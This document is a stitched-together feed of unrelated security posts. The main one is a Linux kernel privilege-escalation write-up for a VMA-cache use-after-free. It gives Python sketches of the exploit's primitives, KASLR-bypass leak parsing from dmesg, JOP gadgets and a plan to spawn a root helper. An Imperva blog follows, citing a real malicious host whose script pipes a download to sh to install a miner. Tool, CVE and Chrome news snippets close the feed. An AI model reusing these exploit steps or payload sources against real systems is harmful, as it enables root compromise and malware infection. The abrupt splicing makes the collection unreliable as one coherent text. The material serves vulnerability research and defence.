Interestingly, it looks like Docker in its default config doesn't prevent containers from accessing the host's dmesg logs if the kernel permits dmesg access for normal users - while /dev/kmsg doesn't exist in the container, the seccomp policy whitelists the syslog() syscall for some reason.

BUG_ON(), WARN_ON_ONCE(), and dmesg

The function in which the first use-after-free access occurs is vmacache_find(). When this function was first added - before the bug was introduced -, it accessed the VMA cache as follows:

      for (i = 0; i < VMACACHE_SIZE; i++) {
              struct vm_area_struct *vma = current->vmacache[i];

              if (vma && vma->vm_start <= addr && vma->vm_end > addr) {
                      BUG_ON(vma->vm_mm != mm);
                      return vma;
              }
      }

When this code encountered a cached VMA whose bounds contain the supplied address addr, it checked whether the VMA's ->vm_mm pointer matches the expected mm_struct - which should always be the case, unless a memory safety problem has happened -, and if not, terminated with a BUG_ON() assertion failure. BUG_ON() is intended to handle cases in which a kernel thread detects a severe problem that can't be cleanly handled by bailing out of the current context. In a default upstream kernel configuration, BUG_ON() will normally print a backtrace with register dumps to the dmesg log buffer, then forcibly terminate the current thread. This can sometimes prevent the rest of the system from continuing to work properly - for example, if the crashing code held an important lock, any other thread that attempts to take that lock will then deadlock -, but it is often successful in keeping the rest of the system in a reasonably usable state. Only when the kernel detects that the crash is in a critical context, such as an interrupt handler, does it bring down the whole system with a kernel panic.

The same handler code is used for dealing with unexpected crashes in kernel code, like page faults and general protection faults at non-whitelisted addresses: By default, if possible, the kernel will attempt to terminate only the offending thread.

The handling of kernel crashes is a tradeoff between availability, reliability and security. A system owner might want a system to keep running as long as possible, even if parts of the system are crashing, if a sudden kernel panic would cause data loss or downtime of an important service. Similarly, a system owner might want to debug a kernel bug on a live system, without an external debugger; if the whole system terminated as soon as the bug is triggered, it might be harder to debug an issue properly.
On the other hand, an attacker attempting to exploit a kernel bug might benefit from the ability to retry an attack multiple times without triggering system reboots; and an attacker with the ability to read the crash log produced by the first attempt might even be able to use that information for a more sophisticated second attempt.

The kernel provides two sysctls that can be used to adjust this behavior, depending on the desired tradeoff:

  • kernel.panic_on_oops will automatically cause a kernel panic when a BUG_ON() assertion triggers or the kernel crashes; its initial value can be configured using the build configuration variable CONFIG_PANIC_ON_OOPS. It is off by default in the upstream kernel - and enabling it by default in distributions would probably be a bad idea -, but it is e.g. enabled by Android.
  • kernel.dmesg_restrict controls whether non-root users can access dmesg logs, which, among other things, contain register dumps and stack traces for kernel crashes; its initial value can be configured using the build configuration variable CONFIG_SECURITY_DMESG_RESTRICT. It is off by default in the upstream kernel, but is enabled by some distributions, e.g. Debian. (Android relies on SELinux to block access to dmesg.)

Ubuntu, for example, enables neither of these.
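Both knobs are exposed under /proc/sys, so checking how a given machine is configured takes a few lines, for example in Python (running sysctl kernel.panic_on_oops kernel.dmesg_restrict gives the same answer):

# Print the current values of the two tradeoff knobs discussed above.
for knob in ("kernel.panic_on_oops", "kernel.dmesg_restrict"):
    path = "/proc/sys/" + knob.replace(".", "/")
    try:
        with open(path) as f:
            print(knob, "=", f.read().strip())
    except FileNotFoundError:
        print(knob, "is not available on this kernel")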


The code snippet from above was amended in the same month as it was committed:

      for (i = 0; i < VMACACHE_SIZE; i++) {
               struct vm_area_struct *vma = current->vmacache[i];
-               if (vma && vma->vm_start <= addr && vma->vm_end > addr) {
-                       BUG_ON(vma->vm_mm != mm);
+               if (!vma)
+                       continue;
+               if (WARN_ON_ONCE(vma->vm_mm != mm))
+                       break;
+               if (vma->vm_start <= addr && vma->vm_end > addr)
                       return vma;
-               }
       }

This amended code is what distributions like Ubuntu are currently shipping.

The first change here is that the sanity check for a dangling pointer happens before the address comparison. The second change is somewhat more interesting: BUG_ON() is replaced with WARN_ON_ONCE().

WARN_ON_ONCE() prints debug information to dmesg that is similar to what BUG_ON() would print. The differences to BUG_ON() are that WARN_ON_ONCE() only prints debug information the first time it triggers, and that execution continues: Now when the kernel detects a dangling pointer in the VMA cache lookup fastpath - in other words, when it heuristically detects that a use-after-free has happened -, it just bails out of the fastpath and falls back to the red-black tree walk. The process continues normally.

This fits in with the kernel's policy of attempting to keep the system running as much as possible by default; if an accidental use-after-free bug occurs here for some reason, the kernel can probably heuristically mitigate its effects and keep the process working.

The policy of only printing a warning even when the kernel has discovered a memory corruption is problematic for systems that should kernel panic when the kernel notices security-relevant events like kernel memory corruption. Simply making WARN() trigger kernel panics isn't really an option because WARN() is also used for various events that are not important to the kernel's security. For this reason, a few uses of WARN_ON() in security-relevant places have been replaced with CHECK_DATA_CORRUPTION(), which permits toggling the behavior between BUG() and WARN() at kernel configuration time. However, CHECK_DATA_CORRUPTION() is only used in the linked list manipulation code and in addr_limit_user_check(); the check in the VMA cache, for example, still uses a classic WARN_ON_ONCE().


A third important change was made to this function; however, this change is relatively recent and will first be in the 4.19 kernel, which hasn't been released yet, so it is irrelevant for attacking currently deployed kernels.

      for (i = 0; i < VMACACHE_SIZE; i++) {
-               struct vm_area_struct *vma = current->vmacache.vmas[i];
+               struct vm_area_struct *vma = current->vmacache.vmas[idx];
-               if (!vma)
-                       continue;
-               if (WARN_ON_ONCE(vma->vm_mm != mm))
-                       break;
-               if (vma->vm_start <= addr && vma->vm_end > addr) {
-                       count_vm_vmacache_event(VMACACHE_FIND_HITS);
-                       return vma;
+               if (vma) {
+#ifdef CONFIG_DEBUG_VM_VMACACHE
+                       if (WARN_ON_ONCE(vma->vm_mm != mm))
+                               break;
+#endif
+                       if (vma->vm_start <= addr && vma->vm_end > addr) {
+                               count_vm_vmacache_event(VMACACHE_FIND_HITS);
+                               return vma;
+                       }
               }
+               if (++idx == VMACACHE_SIZE)
+                       idx = 0;
       }

After this change, the sanity check is skipped altogether unless the kernel is built with the debugging option CONFIG_DEBUG_VM_VMACACHE.

The exploit: Incrementing the sequence number

The exploit has to increment the sequence number roughly 2^33 times: about 2^32 increments to wrap the counter to zero in the single-threaded phase, then up to 2^32 more from the second thread to drive it back to 0xffffffff. Therefore, the efficiency of the primitive used to increment the sequence number is important for the runtime of the whole exploit.

It is possible to cause two sequence number increments per syscall as follows: Create an anonymous VMA that spans three pages. Then repeatedly use mmap() with MAP_FIXED to replace the middle page with an equivalent VMA. This causes mmap() to first split the VMA into three VMAs, then replace the middle VMA, and then merge the three VMAs together again, causing VMA cache invalidations for the two VMAs that are deleted while merging the VMAs.
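For illustration, here is a user-space sketch of that increment primitive in Python, reaching mmap() through ctypes; the flag values are the x86-64 Linux constants, and this is a sketch of the technique, not the exploit's actual code:

import ctypes

libc = ctypes.CDLL(None, use_errno=True)
libc.mmap.restype = ctypes.c_void_p
libc.mmap.argtypes = [ctypes.c_void_p, ctypes.c_size_t, ctypes.c_int,
                      ctypes.c_int, ctypes.c_int, ctypes.c_long]

PROT_READ, PROT_WRITE = 0x1, 0x2
MAP_PRIVATE, MAP_FIXED, MAP_ANONYMOUS = 0x02, 0x10, 0x20
PAGE = 0x1000

# One anonymous VMA spanning three pages.
base = libc.mmap(None, 3 * PAGE, PROT_READ | PROT_WRITE,
                 MAP_PRIVATE | MAP_ANONYMOUS, -1, 0)

# Each MAP_FIXED replacement of the middle page splits the VMA into three,
# replaces the middle one, and merges the pieces back together - deleting
# two VMAs, i.e. two sequence-number increments per syscall.
for _ in range(1_000_000):  # the real exploit needs ~2**32 iterations
    libc.mmap(base + PAGE, PAGE, PROT_READ | PROT_WRITE,
              MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0)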

The exploit: Replacing the VMA

Enumerating all potential ways to attack the use-after-free without releasing the slab's backing page (according to /proc/slabinfo, the Ubuntu kernel uses one page per vm_area_struct slab) back to the buddy allocator / page allocator:

  1. Get the vm_area_struct reused in the same process. The process would then be able to use this VMA, but this doesn't result in anything interesting, since the VMA caches of the process would be allowed to contain pointers to the VMA anyway.
  2. Free the vm_area_struct such that it is on the slab allocator's freelist, then attempt to access it. However, at least the SLUB allocator that Ubuntu uses replaces the first 8 bytes of the vm_area_struct (which contain vm_start, the userspace start address) with a kernel address. This makes it impossible for the VMA cache lookup function to return it, since the condition vma->vm_start <= addr && vma->vm_end > addr can't be fulfilled, and therefore nothing interesting happens.
  3. Free the vm_area_struct such that it is on the slab allocator's freelist, then allocate it in another process. This would (with the exception of a very narrow race condition that can't easily be triggered repeatedly) result in hitting the WARN_ON_ONCE(), and therefore the VMA cache lookup function wouldn't return the VMA.
  4. Free the vm_area_struct such that it is on the slab allocator's freelist, then make an allocation from a slab that has been merged with the vm_area_struct slab. This requires the existence of an aliasing slab; in a Ubuntu 18.04 VM, no such slab seems to exist.

Therefore, to exploit this bug, it is necessary to release the backing page back to the page allocator, then reallocate the page in some way that permits placing controlled data in it. There are various kernel interfaces that could be used for this; for example:

pipe pages:
  • advantage: not wiped on allocation
  • advantage: permits writing at an arbitrary in-page offset if splice() is available
  • advantage: page-aligned
  • disadvantage: can't do multiple writes without first freeing the page, then reallocating it

BPF maps:
  • advantage: can repeatedly read and write contents from userspace
  • advantage: page-aligned
  • disadvantage: wiped on allocation

This exploit uses BPF maps.
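For illustration, a rough ctypes sketch of the BPF_MAP_CREATE call on x86-64 follows; the syscall number and map-type constants are stable kernel ABI, while the value size here is purely illustrative (the real exploit sizes its allocations to match the slab layout it targets), and this assumes a kernel that permits unprivileged bpf():

import ctypes

SYS_bpf = 321  # x86-64 syscall number
BPF_MAP_CREATE, BPF_MAP_TYPE_ARRAY = 0, 2

class BpfAttr(ctypes.Structure):  # leading fields of union bpf_attr
    _fields_ = [("map_type", ctypes.c_uint32),
                ("key_size", ctypes.c_uint32),
                ("value_size", ctypes.c_uint32),
                ("max_entries", ctypes.c_uint32),
                ("map_flags", ctypes.c_uint32)]

libc = ctypes.CDLL(None, use_errno=True)
attr = BpfAttr(map_type=BPF_MAP_TYPE_ARRAY, key_size=4,
               value_size=0xd00, max_entries=1)  # illustrative sizing
fd = libc.syscall(SYS_bpf, BPF_MAP_CREATE, ctypes.byref(attr),
                  ctypes.sizeof(attr))
print("BPF array map fd:", fd)  # the map's value can now be read/written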

The exploit: Leaking pointers from dmesg

The exploit wants to have the following information:

  • address of the mm_struct
  • address of the use-after-free'd VMA
  • load address of kernel code

At least in the Ubuntu 18.04 kernel, the first two of these are directly visible in the register dump triggered by WARN_ON_ONCE(), and can therefore easily be extracted from dmesg: The mm_struct's address is in RDI, and the VMA's address is in RAX. However, an instruction pointer is not directly visible because RIP and the stack are symbolized, and none of the general-purpose registers contain an instruction pointer.

A kernel backtrace can contain multiple sets of registers: When the stack backtracing logic encounters an interrupt frame, it generates another register dump. Since we can trigger the WARN_ON_ONCE() through a page fault on a userspace address, and page faults on userspace addresses can happen at any userspace memory access in syscall context (via copy_from_user()/copy_to_user()/...), we can pick a call site that has the relevant information in a register from a wide range of choices. It turns out that writing to an eventfd triggers a usercopy while R8 still contains the pointer to the eventfd_fops structure.

When the exploit runs, it replaces the VMA with zeroed memory, then triggers a VMA lookup against the broken VMA cache, intentionally triggering the WARN_ON_ONCE(). This generates a warning that looks as follows - the leaks used by the exploit are highlighted:

[ 3482.271265] WARNING: CPU: 0 PID: 1871 at /build/linux-SlLHxe/linux-4.15.0/mm/vmacache.c:102 vmacache_find+0x9c/0xb0
[...]
[ 3482.271298] RIP: 0010:vmacache_find+0x9c/0xb0
[ 3482.271299] RSP: 0018:ffff9e0bc2263c60 EFLAGS: 00010203
[ 3482.271300] RAX: ffff8c7caf1d61a0 RBX: 00007fffffffd000 RCX: 0000000000000002
[ 3482.271301] RDX: 0000000000000002 RSI: 00007fffffffd000 RDI: ffff8c7c214c7380
[ 3482.271301] RBP: ffff9e0bc2263c60 R08: 0000000000000000 R09: 0000000000000000
[ 3482.271302] R10: 0000000000000000 R11: 0000000000000000 R12: ffff8c7c214c7380
[ 3482.271303] R13: ffff9e0bc2263d58 R14: ffff8c7c214c7380 R15: 0000000000000014
[ 3482.271304] FS:  00007f58c7bf6a80(0000) GS:ffff8c7cbfc00000(0000) knlGS:0000000000000000
[ 3482.271305] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 3482.271305] CR2: 00007fffffffd000 CR3: 00000000a143c004 CR4: 00000000003606f0
[ 3482.271308] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 3482.271309] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[ 3482.271309] Call Trace:
[ 3482.271314]  find_vma+0x1b/0x70
[ 3482.271318]  __do_page_fault+0x174/0x4d0
[ 3482.271320]  do_page_fault+0x2e/0xe0
[ 3482.271323]  do_async_page_fault+0x51/0x80
[ 3482.271326]  async_page_fault+0x25/0x50
[ 3482.271329] RIP: 0010:copy_user_generic_unrolled+0x86/0xc0
[ 3482.271330] RSP: 0018:ffff9e0bc2263e08 EFLAGS: 00050202
[ 3482.271330] RAX: 00007fffffffd008 RBX: 0000000000000008 RCX: 0000000000000001
[ 3482.271331] RDX: 0000000000000000 RSI: 00007fffffffd000 RDI: ffff9e0bc2263e30
[ 3482.271332] RBP: ffff9e0bc2263e20 R08: ffffffffa7243680 R09: 0000000000000002
[ 3482.271333] R10: ffff8c7bb4497738 R11: 0000000000000000 R12: ffff9e0bc2263e30
[ 3482.271333] R13: ffff8c7bb4497700 R14: ffff8c7cb7a72d80 R15: ffff8c7bb4497700
[ 3482.271337]  ? _copy_from_user+0x3e/0x60
[ 3482.271340]  eventfd_write+0x74/0x270
[ 3482.271343]  ? common_file_perm+0x58/0x160
[ 3482.271345]  ? wake_up_q+0x80/0x80
[ 3482.271347]  __vfs_write+0x1b/0x40
[ 3482.271348]  vfs_write+0xb1/0x1a0
[ 3482.271349]  SyS_write+0x55/0xc0
[ 3482.271353]  do_syscall_64+0x73/0x130
[ 3482.271355]  entry_SYSCALL_64_after_hwframe+0x3d/0xa2
[ 3482.271356] RIP: 0033:0x55a2e8ed76a6
[ 3482.271357] RSP: 002b:00007ffe71367ec8 EFLAGS: 00000202 ORIG_RAX: 0000000000000001
[ 3482.271358] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 000055a2e8ed76a6
[ 3482.271358] RDX: 0000000000000008 RSI: 00007fffffffd000 RDI: 0000000000000003
[ 3482.271359] RBP: 0000000000000001 R08: 0000000000000000 R09: 0000000000000000
[ 3482.271359] R10: 0000000000000000 R11: 0000000000000202 R12: 00007ffe71367ec8
[ 3482.271360] R13: 00007fffffffd000 R14: 0000000000000009 R15: 0000000000000000
[ 3482.271361] Code: 00 48 8b 84 c8 10 08 00 00 48 85 c0 74 11 48 39 78 40 75 17 48 39 30 77 06 48 39 70 08 77 8d 83 c2 01 83 fa 04 75 ce 31 c0 5d c3 <0f> 0b 31 c0 5d c3 90 90 90 90 90 90 90 90 90 90 90 90 90 90 0f
[ 3482.271381] ---[ end trace bf256b6e27ee4552 ]---

At this point, the exploit can create a fake VMA that contains the correct mm_struct pointer (leaked from RDI). It also populates other fields with references to fake data structures (by creating pointers back into the fake VMA using the leaked VMA pointer from RAX) and with pointers into the kernel's code (using the leaked R8 from the page fault exception frame to bypass KASLR).
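Scraping those values out of the log is plain text processing. The following sketch assumes the warning above is the only crash in the dmesg buffer, and is illustrative parsing, not the exploit's actual code:

import re, subprocess

log = subprocess.run(["dmesg"], capture_output=True, text=True).stdout

# Each register dump lists RAX ... RDI ... R08 in that order, so one
# non-greedy pattern matches per dump: dump 0 is the WARN_ON_ONCE() frame,
# dump 1 the interrupt frame whose R8 points into the kernel's code.
dumps = re.findall(r"RAX: ([0-9a-f]{16}).*?RDI: ([0-9a-f]{16})"
                   r".*?R08: ([0-9a-f]{16})", log, re.DOTALL)

vma, mm_struct, _ = dumps[0]  # WARN frame: RAX = freed VMA, RDI = mm_struct
_, _, code_ptr = dumps[1]     # interrupt frame: R8 = &eventfd_fops

print("mm_struct 0x" + mm_struct, "VMA 0x" + vma, "kernel code 0x" + code_ptr)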

The exploit: JOP (the boring part)

It is probably possible to exploit this bug in some really elegant way by abusing the ability to overlay a fake writable VMA over existing readonly pages, or something like that; however, this exploit just uses classic jump-oriented programming.

To trigger the use-after-free a second time, a writing memory access is performed on an address that has no pagetable entries. At this point, the kernel's page fault handler comes in via page_fault -> do_page_fault -> __do_page_fault -> handle_mm_fault -> __handle_mm_fault -> handle_pte_fault -> do_fault -> do_shared_fault -> __do_fault, at which point it performs an indirect call:

static int __do_fault(struct vm_fault *vmf)
{
struct vm_area_struct *vma = vmf->vma;
int ret;

ret = vma->vm_ops->fault(vmf);

vma is the VMA structure we control, so at this point, we can gain instruction pointer control. R13 contains a pointer to vma. The JOP chain that is used from there on follows; it is quite crude (for example, it crashes after having done its job), but it works.

First, to move the VMA pointer to RDI:

ffffffff810b5c21: 49 8b 45 70           mov rax,QWORD PTR [r13+0x70]
ffffffff810b5c25: 48 8b 80 88 00 00 00  mov rax,QWORD PTR [rax+0x88]
ffffffff810b5c2c: 48 85 c0              test rax,rax
ffffffff810b5c2f: 74 08                 je ffffffff810b5c39
ffffffff810b5c31: 4c 89 ef              mov rdi,r13
ffffffff810b5c34: e8 c7 d3 b4 00        call ffffffff81c03000 <__x86_indirect_thunk_rax>

Then, to get full control over RDI:

ffffffff810a4aaa: 48 89 fb              mov rbx,rdi
ffffffff810a4aad: 48 8b 43 20           mov rax,QWORD PTR [rbx+0x20]
ffffffff810a4ab1: 48 8b 7f 28           mov rdi,QWORD PTR [rdi+0x28]
ffffffff810a4ab5: e8 46 e5 b5 00        call ffffffff81c03000 <__x86_indirect_thunk_rax>

At this point, we can call into run_cmd(), which spawns a root-privileged usermode helper, using a space-delimited path and argument list as its only argument. This gives us the ability to run a binary we have supplied with root privileges. (Thanks to Mark for pointing out that if you control RDI and RIP, you don't have to try to do crazy things like flipping the SM*P bits in CR4, you can just spawn a usermode helper...)

After launching the usermode helper, the kernel crashes with a page fault because the JOP chain doesn't cleanly terminate; however, since that only kills the process in whose context the fault occurred, it doesn't really matter.

Fix timeline

This bug was reported 2018-09-12. Two days later, 2018-09-14, a fix was in the upstream kernel tree. This is exceptionally fast, compared to the fix times of other software vendors. At this point, downstream vendors could theoretically backport and apply the patch. The bug is essentially public at this point, even if its security impact is obfuscated by the commit message, as grsecurity frequently demonstrates.

However, a fix being in the upstream kernel does not automatically mean that users' systems are actually patched. The normal process for shipping fixes to users who use distribution kernels based on upstream stable branches works roughly as follows:

  1. A patch lands in the upstream kernel.
  2. The patch is backported to an upstream-supported stable kernel.
  3. The distribution merges the changes from upstream-supported stable kernels into its kernels.
  4. Users install the new distribution kernel.

Note that the patch becomes public after step 1, potentially allowing attackers to develop an exploit, but users are only protected after step 4.

In this case, the backports to the upstream-supported stable kernels 4.18, 4.14, 4.9 and 4.4 were published on 2018-09-19, five days after the patch became public, at which point the distributions could pull in the patch.

Upstream stable kernel updates are published very frequently. For example, looking at the last few stable releases for the 4.14 stable kernel, which is the newest upstream longterm maintenance release:

4.14.72 on 2018-09-26
4.14.71 on 2018-09-19
4.14.70 on 2018-09-15
4.14.69 on 2018-09-09
4.14.68 on 2018-09-05
4.14.67 on 2018-08-24
4.14.66 on 2018-08-22

The 4.9 and 4.4 longterm maintenance kernels are updated similarly frequently; only the 3.16 longterm maintenance kernel has not received any updates between the most recent update on 2018-09-25 (3.16.58) and the previous one on 2018-06-16 (3.16.57).

However, Linux distributions often don't publish distribution kernel updates very frequently. For example, Debian stable ships a kernel based on 4.9, but as of 2018-09-26, this kernel was last updated 2018-08-21. Similarly, Ubuntu 16.04 ships a kernel that was last updated 2018-08-27. Android only ships security updates once a month. Therefore, when a security-critical fix is available in an upstream stable kernel, it can still take weeks before the fix is actually available to users - especially if the security impact is not announced publicly.

In this case, the security issue was announced on the oss-security mailing list on 2018-09-18, with a CVE allocation on 2018-09-19, making the need to ship new distribution kernels to users clearer. Still: As of 2018-09-26, both Debian and Ubuntu (in releases 16.04 and 18.04) track the bug as unfixed.


Fedora pushed an update to users on 2018-09-22: https://bugzilla.redhat.com/show_bug.cgi?id=1631206#c8

Conclusion

This exploit shows how much impact the kernel configuration can have on how easy it is to write an exploit for a kernel bug. While simply turning on every security-related kernel configuration option is probably a bad idea, some of them - like the kernel.dmesg_restrict sysctl - seem to provide a reasonable tradeoff when enabled.

The fix timeline shows that the kernel's approach to handling severe security bugs is very efficient at quickly landing fixes in the git master tree, but leaves a window of exposure between the time an upstream fix is published and the time the fix actually becomes available to users - and this time window is sufficiently large that a kernel exploit could be written by an attacker in the meantime.

The World’s Most Popular Coding Language Happens to be Most Hackers’ Weapon of Choice

Python will soon be the world’s most prevalent coding language.

That’s quite a statement, but if you look at its simplicity, flexibility and the relative ease with which folks pick it up, it’s not hard to see why The Economist recently touted it as the soon-to-be most used language, globally. Naturally, our threat research team had to poke around and see how popular Python is among bad actors.

And the best place to do that is, well, GitHub, of course. Roughly estimating, more than 20% of GitHub repositories that implement an attack tool or exploit PoC are written in Python. In virtually every security-related topic on GitHub, the majority of the repositories are written in Python, including tools such as w3af, Sqlmap, and even the infamous AutoSploit tool.

At Imperva, we use an advanced intelligent Client Classification mechanism that distinguishes and classifies various web clients. When we take a look at our data, specifically security incidents, the largest share of the clients (>25%) we identify — excluding vulnerability scanners — are based on Python.

Unlike other clients, with Python we see a host of different attack vectors and the usage of known exploits. Hackers, like developers, enjoy Python’s advantages, which make it a popular hacking tool.

Figure 1: Security incidents by client, excluding vulnerability scanners. More than 25% of the clients were Python-based tools used by malicious actors, making it the most common vector for launching exploit attempts.

When examining the use of Python in attacks against sites we protect, the result was unsurprising – a large chunk, up to 77%, of the sites were attacked by a Python-based tool, and in over a third of the cases a Python-based tool was responsible for the majority of daily attacks. These levels, over time, show that Python-based tools are used for both breadth and depth scanning.  

Figure 2: Daily percentage of sites suffering Python-based attacks

Python Modules

The two most popular Python modules used for web attacks are Urllib and Python Requests. The chart below shows the attack distribution. Use of the newer Async IO module is just kicking off, which makes perfect sense when you consider the vast possibilities the library offers in the field of layer 7 DDoS, especially when using a “Spray N’ Pray” technique.
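Both modules also announce themselves in their default User-Agent headers ("python-requests/2.x" and "Python-urllib/3.x", with "aiohttp" for the Async IO ecosystem), which is one of the simpler signals a client classifier can key on. A toy tally over a combined-format access log:

import re
from collections import Counter

SIGNATURES = {
    "python-requests": "Requests",
    "Python-urllib": "Urllib",
    "aiohttp": "Async IO (aiohttp)",
}

counts = Counter()
with open("access.log") as f:  # combined log format: UA is the last quoted field
    for line in f:
        m = re.search(r'"([^"]*)"\s*$', line)
        ua = m.group(1) if m else ""
        for token, name in SIGNATURES.items():
            if token in ua:
                counts[name] += 1

print(counts.most_common())

A default User-Agent is trivially spoofed, of course, which is why real client classification relies on far more than this one header.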

Python and Known Exploits

The advantages of Python as a coding language make it a popular tool for implementing known exploits. We collected information on the top 10 vulnerabilities recently used by Python-based tools, and we don’t expect this trend to stop.

The two most popular attacks in the last 2 months used CVE-2017-9841, a PHP-based Remote Code Execution (RCE) vulnerability in the PHPUnit framework, and CVE-2015-8562, an RCE against the Joomla! framework. It isn’t surprising that the most common attacks had RCE potential, considering how valuable remote code execution is to malicious actors.

Another example, which isn’t in the top 10, is CVE-2018-1000207, which saw hundreds of attacks each day for several days during the last week of August 2018. Deeper analysis shows that the attack was carried out against multiple protected customers by a group of IPs from China.

CVEs over time


You can see that the number of CVEs being used by attackers has, according to our data, increased in the last few years.

In addition, Python is used to target specific applications and frameworks – below are the top 10, according to our data.

When we looked at all the frameworks targeted by Python, the attacks that stand out are those aimed at Struts, WordPress, Joomla and Drupal, which is not surprising as these are currently some of the most popular frameworks out there.

Attack vectors

The most popular HTTP parameter value we’ve seen used in attacks (responsible for around 30% of all distinct parameter values observed) belongs to a backdoor upload attempt through a PHP unserialize vulnerability in Joomla! using the JDatabaseDriverMysqli object. The uploaded backdoor payload is hosted on ICG-AuthExploiterBot.

We’ve also seen a recurring payload that turned out to be a Coinbitminer infection attempt, more details on that are in the appendix — note, the appendix is only meant as an example. Since Python is so widely used by hackers, there is a host of different attack vectors to take into consideration. Python requires minimal coding skills, making it easy to write a script and exploit a vulnerability.

Our recommendation

Unless you can differentiate between requests from Python-based tools and any other tool, our recommendations stay the same – make sure to keep security in mind when developing, keep your system up to date with patches, and refrain from any practice that is considered insecure.

Appendix – Example of an Attack

Here’s an interesting, recurring payload we’ve observed (with a small variation at the end):


After base64 decoding it, we get a binary payload:

In the above payload, there is a mention of a GitHub repository for a deserialization exploitation tool and a wget command downloading a jpg file, which strongly suggests malicious activity. After downloading the file from http://45.227.252.250/jre.jpg we can see that it’s actually a script containing the following:

The two last lines in the script try to fetch http://45.227.252.250/static/font.jpg and pipe it to sh; the downloaded file is identified as Trojan.Coinbitminer by Symantec Endpoint Protection.

This finding relates to a tweet from the end of August 2018 about a new Apache Struts vulnerability, CVE-2018-11776, being used to spread the same Coinbitminer infection.
While you’re here, also read: Imperva Python SDK – We’re All Consenting SecOps Here

The post The World’s Most Popular Coding Language Happens to be Most Hackers’ Weapon of Choice appeared first on Blog.

New SEI CERT Tool Extracts Artifacts from Free Text for Incident Report Analysis

This post is co-authored with Sam Perl.

The CERT Division of the Software Engineering Institute (SEI) at Carnegie Mellon University recently released the Cyobstract Python library as an open source tool. You can use it to quickly and efficiently extract artifacts from free text in a single report, from a collection of incident reports, from threat assessment summaries, or any other textual source.

Cybersecurity teams need to collect and process data from incident reports, blog posts, news feeds, threat reports, IT tickets, incident tickets, and more. Often incident analysts are looking for technical artifacts to help in their investigation of a threat and development of a mitigation. This activity is often done manually by cutting and pasting between sources and tools. Cyobstract helps extract key artifact values from any kind of text, allowing incident analysts to focus their attention on processing the data once it's extracted. Once artifact values are extracted, they can be more easily correlated across multiple datasets.

After using Cyobstract to extract security-relevant data types, the data can be used for higher level downstream analysis and investigation of source incident reports and data. The resulting data can also be loaded into a database, such as an indicator database. Using Cyobstract, the extracted artifacts can be used to quickly and easily find commonality and similarity across reports, thereby potentially revealing patterns that might otherwise have remained hidden.

At its core, the Cyobstract library is built around a collection of robust regular expressions that target 24 specific security-relevant data types of potential interest, including the following:

  • IP addresses: IPv4, IPv4 CIDR, IPv4 range, IPv6, IPv6 CIDR, and IPv6 range
  • hashes: MD5, SHA1, SHA256, and ssdeep
  • Internet and system-related strings: FQDN, URL, user agent strings, email addresses, filenames, filepaths, and registry keys
  • Internet infrastructure values: ASN, ASN owner, country, and ISP
  • security analysis values: CVE, malware, and attack type

Cyobstract is capable of extracting these artifacts even if they are malformed in some way. For example, in the incident response community, it's often standard practice for teams to "defang" indicators of compromise before storing them or sending them to another team. Defanged indicator values can be difficult for automated solutions to extract. There is no standard practice for defanging, so there are many ways it can be done. Cyobstract was built from a large collection of real incident reports from many organizations so it can handle many ways of defanging that CERT researchers have observed in the field.

In addition to the core extraction library, Cyobstract includes developer tools that teams can use to craft their own regular expressions and capture custom security data types. Analysts typically do this by matching against a list of names to extract; over time, though, that list can grow large and slow to match. Using Cyobstract, analysts can input their list of terms (such as common malware names) and get an optimized regex as output. This expression is significantly faster than trying to match each name on the list directly.

The library also includes benchmarking tools that can track the effect of changes to regular expressions and present the analyst with feedback on the overall effectiveness of the individual change (e.g., this regex change found three more reports than the previous version).

The Cyobstract library can be downloaded from GitHub at https://github.com/cmu-sei/cyobstract.

CVE-2018-1610 (rational_doors_next_generation)

IBM Rational DOORS Next Generation 5.0 through 5.0.2 and 6.0 through 6.0.6 are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 143931.

CVE-2018-7907 (agassi-l09_firmware, agassi-w09_firmware, baggio2-u01a_firmware, bond-al00c_firmware, bond-al10b_firmware, bond-tl10b_firmware, bond-tl10c_firmware, haydn-l1jb_firmware, kobe-l09a_firmware, kobe-l09ahn_firmware, kobe-w09c_firmware, lelandp-l22c_firmware, lelandp-l22d_firmware, rhone-al00_firmware, selina-l02_firmware, stanford-l09s_firmware, toronto-al00_firmware, toronto-al00a_firmware, toronto-tl10_firmware)

Some Huawei products Agassi-L09 AGS-L09C100B257CUSTC100D001, AGS-L09C170B253CUSTC170D001, AGS-L09C199B251CUSTC199D001, AGS-L09C229B003CUSTC229D001, Agassi-W09 AGS-W09C100B257CUSTC100D001, AGS-W09C128B252CUSTC128D001, AGS-W09C170B252CUSTC170D001, AGS-W09C229B251CUSTC229D001, AGS-W09C331B003CUSTC331D001, AGS-W09C794B001CUSTC794D001, Baggio2-U01A BG2-U01C100B160CUSTC100D001, BG2-U01C170B160CUSTC170D001, BG2-U01C199B162CUSTC199D001, BG2-U01C209B160CUSTC209D001, BG2-U01C333B160CUSTC333D001, Bond-AL00C Bond-AL00CC00B201, Bond-AL10B Bond-AL10BC00B201, Bond-TL10B Bond-TL10BC01B201, Bond-TL10C Bond-TL10CC01B131, Haydn-L1JB HDN-L1JC137B068, Kobe-L09A KOB-L09C100B252CUSTC100D001, KOB-L09C209B002CUSTC209D001, KOB-L09C362B001CUSTC362D001, Kobe-L09AHN KOB-L09C233B226, Kobe-W09C KOB-W09C128B251CUSTC128D001, LelandP-L22C 8.0.0.101(C675CUSTC675D2), LelandP-L22D 8.0.0.101(C675CUSTC675D2), Rhone-AL00 Rhone-AL00C00B186, Selina-L02 Selina-L02C432B153, Stanford-L09S Stanford-L09SC432B183, Toronto-AL00 Toronto-AL00C00B223, Toronto-AL00A Toronto-AL00AC00B223, Toronto-TL10 Toronto-TL10C01B223 have a sensitive information leak vulnerability. An attacker can trick a user to install a malicious application to exploit this vulnerability. Due to insufficient verification of the input, successful exploitation can cause sensitive information leak.

Google promises a fix for Chrome’s auto account-sign-in snafu, but you can stop it right now

Google’s Chrome 69 hides a disturbing twist: if you log into Gmail or another Google service, you seem to be signed into the browser itself as well. Theoretically, that means you will automatically begin sharing data with Google, like it or not.

